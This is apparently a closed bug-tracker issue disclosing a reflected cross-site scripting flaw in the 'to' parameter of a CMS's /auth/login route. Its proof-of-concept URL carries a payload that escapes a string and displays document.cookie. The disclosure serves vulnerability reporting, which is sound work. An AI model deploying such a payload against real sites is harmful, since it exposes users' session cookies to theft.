Closed
Description
Insufficient sanitization of to parameter in /auth/login route allows for injection of arbitrary JavaScript code into webpage content creating a reflected XSS attack vector.
See below POC :
https://cms.hosted.com/auth/login?to=/92874%27;alert(%27reflected%20xss!\ncookie:%20%27%2bdocument.cookie)//280
Metadata
Metadata
Assignees
Labels
No labels